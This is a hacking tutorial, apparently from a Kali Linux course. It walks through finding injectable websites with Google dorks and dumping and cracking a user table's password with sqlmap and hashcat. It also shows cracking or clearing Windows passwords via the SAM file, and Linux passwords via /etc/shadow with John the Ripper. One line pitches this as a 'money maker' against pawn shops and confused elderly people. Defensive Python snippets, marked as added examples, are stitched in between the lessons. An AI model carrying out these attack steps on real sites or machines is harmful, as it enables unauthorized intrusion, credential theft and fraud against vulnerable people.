Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
[Source: www.sqlmap.org]
Step 1: Find a Vulnerable Website 
This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.
 
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website 
You can Google a list of Google dork strings.
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection 
For every Google dork string, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue which one is best, but to me the following is the simplest and most conclusive.
Let's say you searched using the string inurl:item_id= and one of the search results shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 
Just add a single quotation mark ' at the end of the URL. (Just to be clear, " is a double quotation mark and ' is a single quotation mark.)
So now your URL will become like this: 
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15' 
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads normally or redirects you to a different page, move on to the next site in your Google search results.
See the example error below in the screenshot. I've obscured everything, including the URL and page design, for obvious reasons.
Examples of SQLi Errors from Different Databases and Languages 
Microsoft SQL Server 
Server Error in '/' Application. Unclosed quotation mark before the character string 'attack;'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attack;'.
 
MySQL Errors 
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 12
Oracle Errors 
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not properly terminated
 
PostgreSQL Errors 
Query failed: ERROR: unterminated quoted string at or near "'''"
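The single-quote check works because the item_id value is spliced into SQL text, so a stray quote becomes syntax. As an added example that is not part of the course, here is the lookup written both ways in Python against an in-memory SQLite table (table contents and function names are constructed), plus a matcher for the error texts listed above that a log monitor can use to flag responses that leak DBMS errors.

```python
"""Added example, not from the course: the item_id lookup built two ways.
The string-built version fails on the tutorial's probe value "15'" with a
database error (the symptom Step 1.b looks for); the parameterized version
treats the same input as plain data. Table and names are constructed."""
import re
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory table loosely modelled on the tutorial's 'item'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO item VALUES (?, ?)",
                     [(15, "widget"), (16, "gadget")])
    return conn

def lookup_vulnerable(conn, item_id: str):
    """Request parameter spliced into SQL text: a quote ends the literal."""
    sql = "SELECT name FROM item WHERE item_id = '" + item_id + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, item_id: str):
    """Bound parameter: the driver never parses the value as SQL."""
    sql = "SELECT name FROM item WHERE item_id = ?"
    return conn.execute(sql, (item_id,)).fetchall()

def probe(lookup, conn, item_id: str):
    """Mimic the single-quote check: ("ok", rows) or ("sql_error", message)."""
    try:
        return ("ok", lookup(conn, item_id))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))

# Signatures of the DBMS error texts listed above. A response body matching
# one of these leaks database details: serve a generic error page instead,
# and alert on the occurrence in application logs.
ERROR_SIGNATURES = {
    "mssql": re.compile(r"Unclosed quotation mark"),
    "mysql": re.compile(r"error in your SQL syntax|mysql_fetch_array\(\)"),
    "oracle": re.compile(r"\bORA-\d{5}\b"),
    "postgresql": re.compile(r"unterminated quoted string"),
}

def classify_error(body: str):
    """Name the DBMS whose error signature appears in a response body, or None."""
    for dbms, pattern in ERROR_SIGNATURES.items():
        if pattern.search(body):
            return dbms
    return None

if __name__ == "__main__":
    db = make_db()
    for value in ("15", "15'"):
        print(value, probe(lookup_vulnerable, db, value), probe(lookup_safe, db, value))
```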
 
Step 2: List DBMS databases using SQLMAP SQL Injection 
As you can see from the screenshot above, I've found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases behind that vulnerable site (this is also called enumerating the number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.
 
Run the following command against your vulnerable website:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs 
Here:
sqlmap = name of the sqlmap binary
-u = target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15")
--dbs = enumerate DBMS databases
This command reveals quite a bit of interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database in almost every MySQL installation, so our interest would be in the sqldummywebsite database.
 
Step 3: List tables of target database using SQLMAP SQL Injection 
Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.
 
Step 4: List columns on target table of selected database using SQLMAP SQL Injection 
Now we need to list all the columns of the target table user_info in the sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy; run the following command:
 
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
 
This returns 5 entries from target table user_info of sqldummywebsite database. 
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
 
AHA! This is exactly what we are looking for: the target columns user_login and user_password.
 
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes it easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
 
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there, we now only need the password for this user. The next step shows just that.
 
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You're probably getting used to how the SQLMAP SQL Injection tool works by now. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
 
TADA!! We have the password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
 
But hang on, this password looks funny. This can't be someone's password. Someone who leaves their website vulnerable like that just can't have a password like that.
That is exactly right. This is a hashed password. That means the stored value is a one-way hash of the password rather than the password itself, so we need to crack it (find a password that produces this hash) rather than decrypt it.
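Steps 1 to 6 above all pass through one injectable parameter. As an added example that is not part of the course, this Python scans constructed Apache combined-format access log lines for the same activity from the server side: a parameter that should be numeric carrying a quote or SQL tokens, and sqlmap's default User-Agent (the log lines, the expected-type table and the UA version string are constructed).

```python
"""Added example, not from the course: spot the probing from Steps 1 to 6 in
web server access logs. The tutorial's check appends a quote to item_id, and
sqlmap then sends boolean, UNION and time-based payloads through the same
parameter. Log lines, expected-type table and UA version are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Allow-list of what each parameter is supposed to look like (constructed):
# item_id should only ever be a short integer, so anything else is suspicious.
EXPECTED = {"item_id": re.compile(r"^\d{1,10}$")}

# Fragments typical of the injection techniques listed under sqlmap's features.
SQLI_TOKENS = re.compile(
    r"'|--|/\*|\bunion\b.*\bselect\b|\b(?:and|or)\b\s*\d+\s*=\s*\d+|\bsleep\s*\(",
    re.IGNORECASE,
)

# Combined log format: ip ident user [time] "method path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"'
)

def analyze_line(line: str):
    """Return the list of findings for one access log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ip, path, agent = m.groups()
    findings = []
    if "sqlmap" in agent.lower():   # sqlmap announces itself unless told otherwise
        findings.append("sqlmap user-agent")
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        expected = EXPECTED.get(name)
        if expected and not expected.match(value):
            findings.append(f"{name} not of expected type: {value!r}")
        elif SQLI_TOKENS.search(value):
            findings.append(f"{name} contains SQL tokens: {value!r}")
    return findings

def scan_log(lines):
    """Return [(client_ip, findings), ...] for lines that have findings."""
    hits = []
    for line in lines:
        found = analyze_line(line)
        if found:
            hits.append((line.split(" ", 1)[0], found))
    return hits

# Constructed sample traffic against the tutorial's example URL.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:10:55:50 +0000] "GET /cgi-bin/item.cgi?item_id=15 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:10:55:51 +0000] "GET /cgi-bin/item.cgi?item_id=15%27 HTTP/1.1" 500 311 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:10:55:53 +0000] "GET /cgi-bin/item.cgi?item_id=15%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0 (constructed UA)"',
]
```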
Step 7: Cracking password 
So the hashed password is 24iYBc17xK0e. (the trailing dot is part of the hash). How do you know what type of hash that is?
 
Step 7.a: Identify Hash type 
Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. On the command line, type the following command and paste the hash value at the prompt:
hash-identifier
 
Excellent. So this is a DES(Unix) hash.
 
Step 7.b: Crack HASH using cudahashcat 
First of all I need to know which hash-mode code to use for DES hashes. So let's check that:
cudahashcat --help | grep DES 
 
So it's either 1500 or 3100. But it was a MySQL database, so it must be 1500.
I am running a computer that has an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop I have an AMD/ATI graphics card, so there I will be using oclHashcat. If you're on VirtualBox or VMware, neither cudaHashcat nor oclHashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running: 
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt 
 
Interesting find: the regular (CPU) hashcat was unable to determine the code for the DES hash (it's not in its help menu). However both cudaHashcat and oclHashcat found and cracked the hash.
Anyhow, so here's the cracked password: abc123.
 24iYBc17xK0e.:abc123 
Sweet, we now even have the password for this user. 
 
Lesson 8: Cracking Windows Passwords in Kali Linux 
 
This is probably your number one money maker: pawn shops whose computers were forfeited and need to be sold, and citizens and old people who are just ditzy. Enjoy.
 
Crack and Reset the system password locally using Kali 
 
Insert the USB Live CD and boot your PC. Make sure Boot from USB is the first option in the BIOS boot menu.
 
Boot the Windows machine with the LiveCD. On the boot menu of Kali Linux, select Live (forensic mode). Kali Linux initializes, and when it has loaded, open a terminal window and navigate to the Windows password database file.
 
 
 
Crack the Windows password with ophcrack: 
 
After Kali Linux Live loads, go to the System menu > ophcrack and click OK.
 
Ophcrack uses rainbow tables to crack NTLM and LM hashes into plain text; it's a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. If you have a complex password it will take a lot longer than a simple password, and with the free tables your password may never be cracked.
 
Once the crack is done you will see the password in plain text, write it down and reboot the machine to login. If 
your password isn’t cracked, you can also log in as one of the other users with admin rights and then change 
your password from within Windows. 
 
With the free tables available you will not be able to crack every password, but the paid tables range from $100 to $1000. Windows stores its password hashes (NTLM, and LM on older systems) in the SAM file rather than the passwords themselves, so we simply need to target this file to retrieve the hashes and crack the password.
 
Now you can see the ophcrack application window. Here, click on Load > Encrypted SAM.
 
After that we need to give the path to the SAM directory, which is by default /mnt/hda1/WINDOWS/System32; then click Choose.
 
Here we can see the saved hashes along with the username and user ID.
 
 
Now click on the Crack button and wait for the password. It's quick and easy.
 
That's it. It'll show the password if you succeed with the free tables. I downloaded the XP free small and the Vista free tables. Once you have downloaded the tables you will need to unzip them into separate folders. I made a folder called "hash-tables" and then made 2 more folders within it for each table to unzip to.
 
Run the program and click on “Tables” button. Select the table you downloaded and click “Install”, navigate to 
the folder where you unzipped the table, select it and then click “ok.” You should see green lights next to the 
tables you installed. 
 
 
Reset Windows password with chntpw: 
 
Navigate to the Windows password database file. In almost all versions of Windows, passwords are saved in the SAM file. This file is usually located under /Windows/System32/config. On your system it may look something like this: /media/hda1/Windows/System32/config.
 
The SAM database is usually in /media/name_of_hard_drive/Windows/System32/config.
 
Type the command chntpw -l SAM and it will list all the usernames contained on the Windows system.
 
#chntpw -l SAM 
The command gives us a list of usernames on the system. Once we have the username we want to modify, we simply run the command chntpw -u "username" SAM
 
 
 
In the example below we typed chntpw -u "Sanjai sathish" SAM and got the following menu:
#chntpw -u "Sanjai sathish" SAM
 
 
We now have the option of clearing the password, changing the password, or promoting the user to administrator. Changing the password does not always work on Windows 7 and 8 systems; it may work on XP, so it is recommended to clear the password instead. You will then be able to log in with a blank password. You can also promote the user to a local administrator.
 
 
 
Crack the password in Linux using John the Ripper:
 
John the Ripper is a fast password cracker; its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
 
John the Ripper is a popular dictionary-based password cracking tool. It uses a wordlist full of passwords and then tries to crack a given password hash using each password from the wordlist. This is the most basic form of password cracking (loosely called brute-force cracking) and also the most time- and CPU-consuming technique: the more passwords to try, the more time required.
 
But still, if you want to crack a password locally on your system then john is one of the good tools to try. John is in the top 10 security tools in Kali Linux.
 
In this topic I am going to show you how to use the unshadow command along with john to crack the passwords of users on a Linux system. On Linux the username/password details are stored in the following 2 files:
 
#/etc/passwd 
#/etc/shadow 
 
The actual password hash is stored in /etc/shadow, and this file is accessible only with root access to the machine. So try to get this file from your own Linux system, or first create a new user with a simple password. I will create a new user on my Linux system named happy, with password chess.
 
Now that our new user is created, it's time to crack his password.
 
#unshadow 
 
The unshadow command basically combines the data of /etc/passwd and /etc/shadow to create one file with username and password details. Usage is quite simple.
 
#unshadow /etc/passwd /etc/shadow > ~/crack 
 
We redirected the output of the unshadow command to a new file called crack.
 
Now this new file can be cracked by john. For the wordlist we shall use the password list that comes with john on Kali Linux. It is located at /usr/share/john/password.lst, or you can use your own password lists too.
 
#john --wordlist=/usr/share/john/password.lst ~/crack
Use the --show option to display all of the cracked passwords reliably.
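Step 7.a identified the dumped value as a DES(Unix) hash, and the unshadow file above contains one such hash field per account. As an added example (not from the course and not hash-identifier's own code), the following Python audit reads unshadow-style lines, names each hash's crypt(3) scheme from its prefix, and flags accounts still on legacy DES or MD5 crypt; every sample line is constructed.

```python
"""Added example, not from the course: audit an unshadow-style file
(user:hash:uid:gid:gecos:home:shell) and name each account's password hash
scheme, flagging legacy ones such as the DES(Unix) hash seen in Step 7.a.
The sample lines below are constructed."""
import re

# crypt(3) scheme identifiers: the text between the first two '$' signs.
# Second element marks schemes that are cheap to crack and should be migrated.
CRYPT_SCHEMES = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "y": ("yescrypt", False),
}
# Traditional DES crypt (hash-identifier's "DES(Unix)"): 13 characters from
# the crypt alphabet, the first two of which are the salt.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")

def identify_hash(field: str):
    """Return (scheme_name, is_weak) for one shadow hash field."""
    if field in ("", "*", "!!") or field.startswith("!"):
        return ("locked or no password", False)
    m = re.match(r"^\$([^$]+)\$", field)
    if m and m.group(1) in CRYPT_SCHEMES:
        return CRYPT_SCHEMES[m.group(1)]
    if DES_CRYPT.match(field):
        return ("DES crypt (DES(Unix))", True)
    return ("unknown", False)

def audit_unshadow(text: str):
    """Parse unshadow output and return [(user, scheme, is_weak), ...]."""
    report = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 2 or not parts[0]:
            continue  # skip blank or malformed lines
        scheme, weak = identify_hash(parts[1])
        report.append((parts[0], scheme, weak))
    return report

# Constructed sample: userX carries the DES value dumped in Lesson 7; the $6$
# and $1$ values are made-up placeholders, since only the prefix is inspected.
SAMPLE = """\
root:$6$saltsalt$PLACEHOLDER_SHA512_VALUE:0:0:root:/root:/bin/bash
userX:24iYBc17xK0e.:1001:1001::/home/userX:/bin/bash
legacy:$1$abcdefgh$PLACEHOLDER_MD5_VALUE:1002:1002::/home/legacy:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""

if __name__ == "__main__":
    for user, scheme, weak in audit_unshadow(SAMPLE):
        print(f"{user:8} {scheme}{'  <-- migrate' if weak else ''}")
```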
